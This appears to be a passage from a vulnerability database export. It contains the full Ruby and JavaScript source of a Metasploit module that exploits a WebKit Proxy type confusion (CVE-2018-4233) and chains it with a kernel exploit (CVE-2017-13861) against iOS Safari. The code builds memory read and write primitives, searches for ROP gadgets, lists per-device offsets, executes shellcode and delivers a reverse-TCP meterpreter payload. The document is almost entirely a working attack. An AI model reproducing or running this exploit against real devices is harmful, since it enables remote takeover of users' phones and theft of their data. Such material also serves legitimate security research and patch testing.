Jumping into shellcode...\"); \nvar res = func(); \nif (res === 0) { \nprint(\"[+] Shellcode executed successfully!\"); \n} else { \nprint(\"[-] Shellcode failed to execute: error \" + res); \n} \n \nmemory.write(codeAddr, origCode); \nprint(\"[*] Restored previous JIT code\"); \n \nprint(\"[+] We are done here, continuing WebContent process as if nothing happened =)\"); \nif (typeof(gc) !== 'undefined') \ngc(); \n} \n \nready.then(function() { \ntry { \npwn(); \n} catch (e) { \nprint(\"[-] Exception caught: \" + e); \n} \n}).catch(function(err) { \nprint(\"[-] Initialization failed\"); \n}); \n \n</script> \n</body> \n</html> \n^ \nunless datastore['DEBUG_EXPLOIT'] \nhtml.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') \nend \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \nend \n \nend \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/150779/safari_proxy_object_type_confusion.rb.txt"}, {"lastseen": "2019-06-02T20:33:44", "description": "", "published": "2019-06-02T00:00:00", "type": "packetstorm", "title": "Safari Webkit Proxy Object Type Confusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4233", "CVE-2017-13861"], "modified": "2019-06-02T00:00:00", "id": "PACKETSTORM:153148", "href": "https://packetstormsecurity.com/files/153148/Safari-Webkit-Proxy-Object-Type-Confusion.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Safari Webkit Proxy Object Type Confusion', \n'Description' => %q{ \nThis module exploits a type confusion bug in the Javascript Proxy object in \nWebKit. 
The DFG JIT does not take into account that, through the use of a Proxy, \nit is possible to run arbitrary JS code during the execution of a CreateThis \noperation. This makes it possible to change the structure of e.g. an argument \nwithout causing a bailout, leading to a type confusion (CVE-2018-4233). \n \nThe type confusion leads to the ability to allocate fake Javascript objects, \nas well as the ability to find the address in memory of a Javascript object. \nThis allows us to construct a fake JSCell object that can be used to read \nand write arbitrary memory from Javascript. The module then uses a ROP chain \nto write the first stage shellcode into executable memory within the Safari \nprocess and kick off its execution. \n \nThe first stage maps the second stage macho (containing CVE-2017-13861) into \nexecutable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake \nexploit leads to a kernel task port (TFP0) that can read and write arbitrary \nkernel memory. The process's credential and sandbox structure in the kernel \nis overwritten and the meterpreter payload's code signature hash is added to \nthe kernel's trust cache, allowing Safari to load and execute the (self-signed) \nmeterpreter payload. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'saelo', \n'niklasb', \n'Ian Beer', \n'siguza', \n], \n'References' => [ \n['CVE', '2018-4233'], \n['CVE', '2017-13861'], \n['URL', 'https://github.com/saelo/cve-2018-4233'], \n['URL', 'https://github.com/phoenhex/files/tree/master/exploits/ios-11.3.1'], \n['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1417'], \n['URL', 'https://github.com/JakeBlair420/totally-not-spyware/blob/master/root/js/spyware.js'], \n], \n'Arch' => ARCH_AARCH64, \n'Platform' => 'apple_ios', \n'DefaultTarget' => 0, \n'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' }, \n'Targets' => [[ 'Automatic', {} ]], \n'DisclosureDate' => 'Mar 15 2018')) \nregister_advanced_options([ \nOptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]), \nOptBool.new('DUMP_OFFSETS', [false, \"Show newly found offsets in a javascript prompt\", false]), \n]) \nend \n \ndef exploit_data(directory, file) \npath = ::File.join Msf::Config.data_directory, 'exploits', directory, file \n::File.binread path \nend \n \ndef payload_url \n\"tcp://#{datastore[\"LHOST\"]}:#{datastore[\"LPORT\"]}\" \nend \n \ndef get_version(user_agent) \nif user_agent =~ /OS (.*?) 
like Mac OS X\\)/ \nios_version = Gem::Version.new($1.gsub(\"_\", \".\")) \nreturn ios_version \nend \nfail_with Failure::NotVulnerable, 'Target is not vulnerable' \nend \n \ndef on_request_uri(cli, request) \nif request.uri =~ %r{/apple-touch-icon*} \nreturn \nelsif request.uri =~ %r{/favicon*} \nreturn \nelsif request.uri =~ %r{/payload10$*} \npayload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib_sha1 \nsend_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'}) \nprint_good(\"Sent sha1 iOS 10 payload\") \nreturn \nelsif request.uri =~ %r{/payload11$*} \npayload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib \nsend_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'}) \nprint_good(\"Sent sha256 iOS 11 payload\") \nreturn \nend \n \nuser_agent = request['User-Agent'] \nprint_status(\"Requesting #{request.uri} from #{user_agent}\") \nversion = get_version(user_agent) \nios_11 = (version >= Gem::Version.new('11.0.0')) \nif request.uri =~ %r{/exploit$} \nloader_data = exploit_data('CVE-2017-13861', 'exploit') \nsrvhost = Rex::Socket.resolv_nbo_i(srvhost_addr) \nconfig = [srvhost, srvport].pack(\"Nn\") + payload_url \npayload_url_index = loader_data.index('PAYLOAD_URL') \nloader_data[payload_url_index, config.length] = config \nprint_good(\"Sent async_wake exploit\") \nsend_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'}) \nreturn \nend \n \nget_mem_rw_ios_10 = %Q^ \nfunction get_mem_rw(stage1) { \nvar structs = []; \nfunction sprayStructures() { \nfunction randomString() { \nreturn Math.random().toString(36).replace(/[\\^a-z]+/g, \"\").substr(0, 5) \n} \nfor (var i = 0; i < 4096; i++) { \nvar a = new Float64Array(1); \na[randomString()] = 1337; \nstructs.push(a) \n} \n} \nsprayStructures(); \nvar hax = new Uint8Array(4096); \nvar jsCellHeader = new Int64([0, 16, 0, 0, 0, 39, 24, 1]); \nvar container = { \njsCellHeader: 
jsCellHeader.asJSValue(), \nbutterfly: false, \nvector: hax, \nlengthAndFlags: (new Int64(\"0x0001000000000010\")).asJSValue() \n}; \nvar address = Add(stage1.addrof(container), 16); \nvar fakearray = stage1.fakeobj(address); \nwhile (!(fakearray instanceof Float64Array)) { \njsCellHeader.assignAdd(jsCellHeader, Int64.One); \ncontainer.jsCellHeader = jsCellHeader.asJSValue() \n} \nmemory = { \nread: function(addr, length) { \nfakearray[2] = i2f(addr); \nvar a = new Array(length); \nfor (var i = 0; i < length; i++) a[i] = hax[i]; \nreturn a \n}, \nreadInt64: function(addr) { \nreturn new Int64(this.read(addr, 8)) \n}, \nwrite: function(addr, data) { \nfakearray[2] = i2f(addr); \nfor (var i = 0; i < data.length; i++) hax[i] = data[i] \n}, \nwriteInt64: function(addr, val) { \nreturn this.write(addr, val.bytes()) \n}, \n}; \nvar empty = {}; \nvar header = memory.read(stage1.addrof(empty), 8); \nmemory.write(stage1.addrof(container), header); \nvar f64array = new Float64Array(8); \nheader = memory.read(stage1.addrof(f64array), 16); \nmemory.write(stage1.addrof(fakearray), header); \nmemory.write(Add(stage1.addrof(fakearray), 24), [16, 0, 0, 0, 1, 0, 0, 0]); \nfakearray.container = container; \nreturn memory; \n} \n^ \n \nget_mem_rw_ios_11 = %Q^ \nfunction get_mem_rw(stage1) { \nvar FPO = typeof(SharedArrayBuffer) === 'undefined' ? 
0x18 : 0x10; \nvar structure_spray = [] \nfor (var i = 0; i < 1000; ++i) { \nvar ary = {a:1,b:2,c:3,d:4,e:5,f:6,g:0xfffffff} \nary['prop'+i] = 1 \nstructure_spray.push(ary) \n} \nvar manager = structure_spray[500] \nvar leak_addr = stage1.addrof(manager) \n//print('leaking from: '+ hex(leak_addr)) \nfunction alloc_above_manager(expr) { \nvar res \ndo { \nfor (var i = 0; i < ALLOCS; ++i) { \nstructure_spray.push(eval(expr)) \n} \nres = eval(expr) \n} while (stage1.addrof(res) < leak_addr) \nreturn res \n} \nvar unboxed_size = 100 \nvar unboxed = alloc_above_manager('[' + '13.37,'.repeat(unboxed_size) + ']') \nvar boxed = alloc_above_manager('[{}]') \nvar victim = alloc_above_manager('[]') \n// Will be stored out-of-line at butterfly - 0x10 \nvictim.p0 = 0x1337 \nfunction victim_write(val) { \nvictim.p0 = val \n} \nfunction victim_read() { \nreturn victim.p0 \n} \ni32[0] = 0x200 // Structure ID \ni32[1] = 0x01082007 - 0x10000 // Fake JSCell metadata, adjusted for boxing \nvar outer = { \np0: 0, // Padding, so that the rest of inline properties are 16-byte aligned \np1: f64[0], \np2: manager, \np3: 0xfffffff, // Butterfly indexing mask \n} \nvar fake_addr = stage1.addrof(outer) + FPO + 0x8; \n//print('fake obj @ ' + hex(fake_addr)) \nvar unboxed_addr = stage1.addrof(unboxed) \nvar boxed_addr = stage1.addrof(boxed) \nvar victim_addr = stage1.addrof(victim) \n//print('leak ' + hex(leak_addr) \n//+ ' unboxed ' + hex(unboxed_addr) \n//+ ' boxed ' + hex(boxed_addr) \n//+ ' victim ' + hex(victim_addr)) \nvar holder = {fake: {}} \nholder.fake = stage1.fakeobj(fake_addr) \n// From here on GC would be uncool \n// Share a butterfly for easier boxing/unboxing \nvar shared_butterfly = f2i(holder.fake[(unboxed_addr + 8 - leak_addr) / 8]) \nvar boxed_butterfly = holder.fake[(boxed_addr + 8 - leak_addr) / 8] \nholder.fake[(boxed_addr + 8 - leak_addr) / 8] = i2f(shared_butterfly) \nvar victim_butterfly = holder.fake[(victim_addr + 8 - leak_addr) / 8] \nfunction set_victim_addr(where) 
{ \nholder.fake[(victim_addr + 8 - leak_addr) / 8] = i2f(where + 0x10) \n} \nfunction reset_victim_addr() { \nholder.fake[(victim_addr + 8 - leak_addr) / 8] = victim_butterfly \n} \nvar stage2 = { \naddrof: function(victim) { \nboxed[0] = victim \nreturn f2i(unboxed[0]) \n}, \nfakeobj: function(addr) { \nunboxed[0] = i2f(addr) \nreturn boxed[0] \n}, \nwrite64: function(where, what) { \nset_victim_addr(where) \nvictim_write(this.fakeobj(what)) \nreset_victim_addr() \n}, \nread64: function(where) { \nset_victim_addr(where) \nvar res = this.addrof(victim_read()) \nreset_victim_addr() \nreturn res; \n}, \nwrite_non_zero: function(where, values) { \nfor (var i = 0; i < values.length; ++i) { \nif (values[i] != 0) \nthis.write64(where + i*8, values[i]) \n} \n}, \nreadInt64: function(where) { \nif (where instanceof Int64) { \nwhere = Add(where, 0x10); \nholder.fake[(victim_addr + 8 - leak_addr) / 8] = where.asDouble(); \n} else { \nset_victim_addr(where); \n} \nboxed[0] = victim_read(); \nvar res = f2i(unboxed[0]); \nreset_victim_addr(); \nreturn new Int64(res); \n}, \nread: function(addr, length) { \nvar address = new Int64(addr); \nvar a = new Array(length); \nvar i; \n \nfor (i = 0; i + 8 < length; i += 8) { \nv = this.readInt64(Add(address, i)).bytes() \nfor (var j = 0; j < 8; j++) { \na[i+j] = v[j]; \n} \n} \n \nv = this.readInt64(Add(address, i)).bytes() \nfor (var j = i; j < length; j++) { \na[j] = v[j - i]; \n} \n \nreturn a \n}, \ntest: function() { \nthis.write64(boxed_addr + 0x10, 0xfff) // Overwrite index mask, no biggie \nif (0xfff != this.read64(boxed_addr + 0x10)) { \nfail(2) \n} \n}, \n} \n// Test read/write \nstage2.test() \nreturn stage2; \n} \n^ \n \nget_mem_rw = (version >= Gem::Version.new('11.2.2')) ? 
get_mem_rw_ios_11 : get_mem_rw_ios_10 \nutils = exploit_data \"CVE-2018-4233\", \"utils.js\" \nint64 = exploit_data \"CVE-2018-4233\", \"int64.js\" \ndump_offsets = '' \nif datastore['DUMP_OFFSETS'] \ndump_offsets = %Q^ \nvar offsetstr = uuid + \" : { \"; \nvar offsetarray = [ \"_dlsym\", \"_dlopen\", \"__longjmp\", \"regloader\", \"dispatch\", \"stackloader\", \"movx4\", \"ldrx8\", \"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\", \"__platform_memmove\", \n\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\", \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\", \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\", ]; \nfor (var i = 0; i < offsetarray.length; i++) { \nvar offset = offsets[offsetarray[i]]; \nif (offset) { \nvar offsethex = Sub(offset, cache_slide).toString().replace(\"0x0000000\", \"0x\"); \noffsetstr += \"\\\\\"\" + offsetarray[i] + \"\\\\\" : \" + offsethex + \", \"; \n} \n} \noffsetstr += \"}, \"; \nprompt(\"offsets: \", offsetstr); \n^ \nend \n \nhtml = %Q^ \n<html> \n<body> \n<script> \n \n#{utils} \n#{int64} \n \nprint = alert; \nITERS = 1E4; \nALLOCS = 1E3; \n \nvar conversion_buffer = new ArrayBuffer(8); \nvar f64 = new Float64Array(conversion_buffer); \nvar i32 = new Uint32Array(conversion_buffer); \nvar BASE32 = 0x100000000; \n \nfunction f2i(f) { \nf64[0] = f; \nreturn i32[0] + BASE32 * i32[1]; \n} \n \nfunction i2f(i) { \ni32[0] = i % BASE32; \ni32[1] = i / BASE32; \nreturn f64[0]; \n} \n \nfunction hexit(x) { \nif (x instanceof Int64) return x.toString(); \nif (x < 0) return \"-\" + hex(-x); \nreturn \"0x\" + x.toString(16); \n} \n \nfunction fail(x) { \nprint('FAIL ' + x); \nlocation.reload(); \nthrow null; \n} \n \ncounter = 0; \n \n// CVE-2018-4233 \nfunction trigger(constr, modify, res, val) { \nreturn eval(` \nvar o = [13.37] \nvar Constructor${counter} = function(o) { ${constr} } \nvar hack = false \nvar Wrapper = new Proxy(Constructor${counter}, { \nget: function() { \nif (hack) { \n${modify} \n} \n} \n}) \nfor (var i = 0; i < ITERS; ++i) 
\nnew Wrapper(o) \nhack = true \nvar bar = new Wrapper(o) \n${res} \n`) \n} \n \nvar workbuf = new ArrayBuffer(0x1000000); \nvar payload = new Uint8Array(workbuf); \n \nfunction pwn() { \nvar stage1 = { \naddrof: function(victim) { \nreturn f2i(trigger(\"this.result = o[0]\", \"o[0] = val\", \"bar.result\", victim)) \n}, \nfakeobj: function(addr) { \nreturn trigger(\"o[0] = val\", \"o[0] = {}\", \"o[0]\", i2f(addr)) \n}, \ntest: function() { \nvar addr = this.addrof({ \na: 4919 \n}); \nvar x = this.fakeobj(addr); \nif (x.a != 4919) fail(\"stage1\") \n} \n}; \nstage1.test(); \n \nvar stage2 = get_mem_rw(stage1); \nvar FPO = #{ios_11 ? \"(typeof(SharedArrayBuffer) === 'undefined') ? 0x20 : 0x18;\" : \"0x18;\"} \nvar memory = stage2; \nmemory.u32 = _u32; \n \nvar wrapper = document.createElement(\"div\"); \nvar wrapper_addr = stage1.addrof(wrapper); \nvar el_addr = memory.readInt64(wrapper_addr + FPO); \nvar vtab = memory.readInt64(el_addr); \n \nvar anchor = memory.readInt64(vtab); \nvar hdr = Sub(anchor, anchor.lo() & 0xfff); \nvar b = []; \nwhile(true) \n{ \nif (memory.readInt64(hdr).lo() == 4277009104) { \nfail('WebCore ' + hdr + ' post spectre support coming soon'); \n} \nif(strcmp(memory.read(hdr, 0x10), \"dyld_v1 arm64\")) \n{ \nbreak; \n} \nhdr = Sub(hdr, 0x1000); \n} \n \nvar base_seg = null; \nvar nsegs = memory.u32(Add(hdr, 0x14)); \nvar segdata = memory.read(Add(hdr, memory.u32(Add(hdr, 0x10))), nsegs * 0x20); \nvar segs = []; \nfor(var i = 0; i < nsegs; ++i) \n{ \nvar off = i * 0x20; \nvar seg = \n{ \naddr: new Int64(segdata.slice(off + 0x0, off + 0x8)), \nsize: new Int64(segdata.slice(off + 0x8, off + 0x10)), \nfileoff: new Int64(segdata.slice(off + 0x10, off + 0x18)), \nmaxprot: b2u32(segdata.slice(off + 0x18, off + 0x1c)), \ninitprot: b2u32(segdata.slice(off + 0x1c, off + 0x20)) \n}; \nsegs.push(seg); \nif(seg.fileoff.hi() == 0 && seg.fileoff.lo() == 0 && (seg.size.hi() != 0 || seg.size.lo() != 0)) \n{ \nbase_seg = seg; \n} \n} \nif(base_seg == null) 
\n{ \nfail(\"base_seg\"); \n} \n \nvar cache_slide = Sub(hdr, base_seg.addr); \nvar uuid = memory.readInt64(Add(hdr, 0x58)).lo(); \nvar offset_cache = { \n// iPod Touch 10.1.1 \n788795426 : { \"_dlsym\" : 0x18052ddd8, \"_dlopen\" : 0x18052dd10, \"__longjmp\" : 0x1806ffb78, \"regloader\" : 0x180f0622c, \"dispatch\" : 0x180d7e058, \"stackloader\" : 0x18099a8e8, \"_mach_task_self_\" : 0x1a586e3bc, \n\"__kernelrpc_mach_vm_protect_trap\" : 0x1806240a4, \"__platform_memmove\" : 0x1806ffe00, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1a457c438, }, \n \n// iPhone 5S 10.2.1 \n3432281541 : { \"_dlsym\" : 0x18052edd8, \"_dlopen\" : 0x18052ed10, \"__longjmp\" : 0x180700b78, \"regloader\" : 0x180f07230, \"dispatch\" : 0x180d7f05c, \"stackloader\" : 0x18099b8ec, \"mach_task_self\" : 0x1a6da23bc, \n\"__kernelrpc_mach_vm_protect_trap\" : 0x1806250c0, \"__platform_memmove\" : 0x180700e00, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1a5a0d438, }, \n \n// iPhone 6S 11.0.3 \n425478416 : { \"_dlsym\" : 0x180587574, \"_dlopen\" : 0x180587460, \"__longjmp\" : 0x1807bd7dc, \"regloader\" : 0x180051ad8, \"dispatch\" : 0x19b323a4c, \"stackloader\" : 0x19b2e6f40, \"movx4\" : 0x19b33305c, \n\"ldrx8\" : 0x180060028, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1b15d8a00, \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\" : 0x1b15d8a08, \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\" : 0x1b15d89f8, }, \n}; \n \nvar offsets = offset_cache[uuid]; \nif (offsets) \n{ \nvar k = Object.keys(offsets); \nfor(var i = 0; i < k.length; ++i) \n{ \nvar s = k[i]; \noffsets[s] = Add(offsets[s], cache_slide); \n} \n} \nelse \n{ \nvar syms = {}; \nvar gadgets = {}; \n \nfor(var i = 0; i < segs.length; ++i) \n{ \nsegs[i].addr = Add(segs[i].addr, cache_slide); \n} \nvar libs = \n{ \n\"/usr/lib/system/libdyld.dylib\": [\"_dlsym\", \"_dlopen\"], \n#{ ios_11 ? 
' \n\"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore\": [\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"], \n\"/usr/lib/system/libsystem_platform.dylib\": [\"__longjmp\"], \n' : ' \n\"/usr/lib/system/libsystem_platform.dylib\": [\"__longjmp\", \"__platform_memmove\"], \n\"/usr/lib/system/libsystem_kernel.dylib\": [\"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\"], \n\"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore\": [\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"], \n'} \n} \n \n#{ ios_11 ? ' \nvar opcodes = { \n// ldr x8, [sp] ; str x8, [x19] ; ldp x29, x30, [sp, #0x20] ; ldp x20, x19, [sp, #0x10] ; add sp, sp, #0x30 ; ret \n\"ldrx8\": [ [0xf94003e8, 0xf9000268, 0xa9427bfd, 0xa9414ff4, 0x9100c3ff, 0xd65f03c0] ], \n// blr x21; ldp x29, x30, [sp, 0x30]; ldp x20, x19, [sp, 0x20]; ldp x22, x21, [sp, 0x10]; add sp, sp, 0x40; ret \n\"dispatch\": [ [ 0xd63f02a0, 0xa9437bfd, 0xa9424ff4, 0xa94157f6, 0x910103ff, 0xd65f03c0 ] ], \n// mov x3, x22 ; mov x6, x27 ; mov x0, x24 ; mov x1, x19 ; mov x2, x23 ; ldr x4, [sp] ; blr x8 \n\"regloader\": [ [ 0xaa1603e3, 0xaa1b03e6, 0xaa1803e0, 0xaa1303e1, 0xaa1703e2, 0xf94003e4, 0xd63f0100 ] ], \n// ldp x29, x30, [sp, 0x60]; ldp x20, x19, [sp, 0x50]; ldp x22, x21, [sp, 0x40]; ldp x24, x23, [sp, 0x30]; \n// ldp x26, x25, [sp, 0x20]; ldp x28, x27, [sp, 0x10]; add sp, sp, 0x70; ret \n\"stackloader\": [ [ 0xa9467bfd, 0xa9454ff4, 0xa94457f6, 0xa9435ff8, 0xa94267fa, 0xa9416ffc, 0x9101c3ff, 0xd65f03c0 ] ], \n// mov x4, x20 ; blr x8 \n\"movx4\": [ [ 0xaa1403e4, 0xd63f0100 ] ], \n} \nvar opcode_libs = [ \n\"/usr/lib/PN548.dylib\", // dispatch, stackloader \n\"/usr/lib/libc++.1.dylib\", // ldrx8, regloader, movx4, stackloader \n]; \n \n' : ' \nvar opcodes = { \n// mov x0, x23; mov x1, x22; mov x2, x24; mov x3, x25; mov x4, x26; mov x5, x27; blr x28 \n\"regloader\": [ [ 0xaa1703e0, 0xaa1603e1, 0xaa1803e2, 0xaa1903e3, 0xaa1a03e4, 0xaa1b03e5, 0xd63f0380 ] ], \n\"dispatch\": [ \n// blr x21; ldp x29, x30, 
[sp, 0x30]; ldp x20, x19, [sp, 0x20]; ldp x22, x21, [sp, 0x10]; add sp, sp, 0x40; ret \n[ 0xd63f02a0, 0xa9437bfd, 0xa9424ff4, 0xa94157f6, 0x910103ff, 0xd65f03c0 ], \n// blr x21; sub sp, x29, 0x20; ldp x29, x30, [sp, 0x20]; ldp x20, x19, [sp, 0x10]; ldp x22, x21, [sp], 0x30; ret \n[ 0xd63f02a0, 0xd10083bf, 0xa9427bfd, 0xa9414ff4, 0xa8c357f6, 0xd65f03c0 ], \n], \n\"stackloader\": [ \n// ldp x29, x30, [sp, 0x60]; ldp x20, x19, [sp, 0x50]; ldp x22, x21, [sp, 0x40]; ldp x24, x23, [sp, 0x30]; \n// ldp x26, x25, [sp, 0x20]; ldp x28, x27, [sp, 0x10]; add sp, sp, 0x70; ret \n[ 0xa9467bfd, 0xa9454ff4, 0xa94457f6, 0xa9435ff8, 0xa94267fa, 0xa9416ffc, 0x9101c3ff, 0xd65f03c0 ], \n// sub sp, x29, 0x50; ldp x29, x30, [sp, 0x50]; ldp x20, x19, [sp, 0x40]; ldp x22, x21, [sp, 0x30]; \n// ldp x24, x23, [sp, 0x20]; ldp x26, x25, [sp, 0x10]; ldp x28, x27, [sp], 0x60; ret \n[ 0xd10143bf, 0xa9457bfd, 0xa9444ff4, 0xa94357f6, 0xa9425ff8, 0xa94167fa, 0xa8c66ffc, 0xd65f03c0 ], \n], \n}; \n \nvar opcode_libs = [ \"/usr/lib/libLLVM.dylib\" ]; \n'} \n \nvar imgs = Add(hdr, memory.u32(Add(hdr, 0x18))); \nvar nimgs = memory.u32(Add(hdr, 0x1c)); \nfor(var i = 0; i < nimgs; ++i) \n{ \nvar straddr = off2addr(segs, memory.u32(Add(imgs, i * 0x20 + 0x18))); \nvar fn = function(i) \n{ \nreturn memory.read(Add(straddr, i), 1)[0]; \n}; \nvar base = Add(memory.readInt64(Add(imgs, i * 0x20)), cache_slide); \nif(opcode_libs.some(lib => strcmp(fn, lib))) \n{ \nvar ncmds = memory.u32(Add(base, 0x10)); \nfor(var j = 0, off = 0x20; j < ncmds; ++j) \n{ \nvar cmd = memory.u32(Add(base, off)); \nif(cmd == 0x19 && strcmp(memory.read(Add(base, off + 0x8), 0x10), \"__TEXT\")) // LC_SEGMENT_64 \n{ \nvar nsects = memory.u32(Add(base, off + 0x40)); \nfor(var k = 0, o = off + 0x48; k < nsects; ++k) \n{ \nif(strcmp(memory.read(Add(base, o), 0x10), \"__text\")) \n{ \nvar keys = Object.keys(opcodes).filter(k=>!gadgets.hasOwnProperty[k]) \nif (keys.length == 0) break; \n \nvar addr = Add(memory.readInt64(Add(base, o + 0x20)), 
cache_slide) \nvar size = memory.u32(Add(base, o + 0x28)) \n \n// Copy the entire __text region into a Uint32Array for faster processing. \n// Previously you could map a Uint32Array over the data, but on i7+ devices \n// this caused access violations. \n// Instead we read the entire region and copy it into a Uint32Array. The \n// memory.read primitive has a weird limitation where it's only able to read \n// up to 4096 bytes. to get around this we'll read multiple times and combine \n// them into one. \n \nvar allData = new Uint32Array(size / 4) \nfor (var r = 0; r < size; r += 4096) { \n// Check to ensure we don't read out of the region we want \nvar qty = 4096 \nif (size - r < qty) { \nqty = size - r \n} \nvar data = memory.read(Add(addr, r), qty) \n \n// Data is an array of single bytes. This code takes four entries \n// and converts them into a single 32-bit integer. It then adds it \n// into the `allData` array at the given index \nfor (var h = 0; h < qty; h += 4) { \nvar fourBytes = b2u32(data.slice(h, h + 4)) \nallData[(r + h) / 4] = fourBytes \n} \n} \n \n// Loop through the entire data map looking for each gadget we need \nfor (var f = 0; f < size && keys.length > 0; f++) { \n \n// Check every gadget \nfor (var z = 0; z < keys.length; z++) { \nvar key = keys[z]; \nvar opcode_list = opcodes[key]; \nfor (var y = 0; y < opcode_list.length; y++) { \nvar opcode = opcode_list[y]; \nfor (var t = 0; t < opcode.length; t++) { \nvar op = allData[f+t]; \nif (op == opcode[t]) { \nif (t == opcode.length - 1) { \ngadgets[key] = Add(addr, f*4); \nkeys.splice(z, 1); \nz = keys.length; \nbreak; \n} \ncontinue; \n} \nbreak; \n} \n} \n} \n} \n \nbreak; \n} \no += 0x50; \n} \nbreak; \n} \noff += memory.u32(Add(base, off + 0x4)); \n} \ncontinue; \n} \nvar lookup = null; \nfor(var k = Object.keys(libs), j = 0; j < k.length; ++j) \n{ \nif(strcmp(fn, k[j])) \n{ \nlookup = libs[k[j]]; \nbreak; \n} \n} \nif(lookup != null) \n{ \nfsyms(memory, base, segs, lookup, syms); \n} \n} \n 
\nvar vals = Object.keys(libs).map(function(key) { \nreturn libs[key]; \n}); \nvar k = vals.reduce(function(p,c){ c.forEach(function(e){ p.push(e) });return p; }, []); \nfor(var i = 0; i < k.length; ++i) \n{ \nvar s = k[i]; \nif(syms[s] == null) \n{ \nfail(s); \n} \nsyms[s] = Add(syms[s], cache_slide); \n} \nk = Object.keys(opcodes); \nfor(var i = 0; i < k.length; ++i) \n{ \nvar s = k[i]; \nif(gadgets[s] == null) \n{ \nfail(s); \n} \n} \n \noffsets = {} \noffsets[\"regloader\"] = gadgets[\"regloader\"]; \noffsets[\"dispatch\"] = gadgets[\"dispatch\"]; \noffsets[\"stackloader\"] = gadgets[\"stackloader\"]; \noffsets[\"ldrx8\"] = gadgets[\"ldrx8\"]; \noffsets[\"movx4\"] = gadgets[\"movx4\"]; \noffsets[\"__longjmp\"] = syms[\"__longjmp\"]; \noffsets[\"__kernelrpc_mach_vm_protect_trap\"] = syms[\"__kernelrpc_mach_vm_protect_trap\"]; \noffsets[\"__platform_memmove\"] = syms[\"__platform_memmove\"]; \noffsets[\"_dlopen\"] = syms[\"_dlopen\"]; \noffsets[\"_dlsym\"] = syms[\"_dlsym\"]; \noffsets[\"_mach_task_self_\"] = syms[\"_mach_task_self_\"]; \noffsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] = syms[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"]; \noffsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] = syms[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"]; \noffsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"] = syms[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]; \n \nif (offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] == null && offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"] != null) { \noffsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] = Sub(offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"], 8); \n} \n#{ ios_11 ? 
' \nif (offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] == null && offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] != null) { \noffsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] = Sub(offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"], 8); \n}' : ''} \n \n#{dump_offsets} \n \n} \n \n \nvar regloader = offsets[\"regloader\"]; \nvar dispatch = offsets[\"dispatch\"]; \nvar stackloader = offsets[\"stackloader\"]; \nvar longjmp = offsets[\"__longjmp\"]; \nvar mach_vm_protect = offsets[\"__kernelrpc_mach_vm_protect_trap\"]; \nvar memmove = offsets[\"__platform_memmove\"]; \nvar dlopen = offsets[\"_dlopen\"]; \nvar dlsym = offsets[\"_dlsym\"]; \nvar task_self = offsets[\"_mach_task_self_\"] \nvar endOfFixedMem = offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"]; \nvar startOfFixedMem = offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"]; \n \nvar ldrx8 = offsets[\"ldrx8\"]; // might be null \nvar movx4 = offsets[\"movx4\"]; // might be null \n \nvar mach_task_self_ = new Int64(memory.readInt64(task_self).lo()); \nvar memPoolEnd = memory.readInt64(endOfFixedMem); \n \nvar memPoolStart = Int64.Zero; \nif (startOfFixedMem) { \nmemPoolStart = memory.readInt64(startOfFixedMem); \n} \n \nvar jitWriteSeparateHeaps = Int64.Zero; \nif (offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]) { \njitWriteSeparateHeaps = memory.readInt64(offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]); \n} \n \nvar shsz = new Int64(\"0x100000\"); \nvar paddr = memory.readInt64(Add(stage1.addrof(payload), 0x10)); 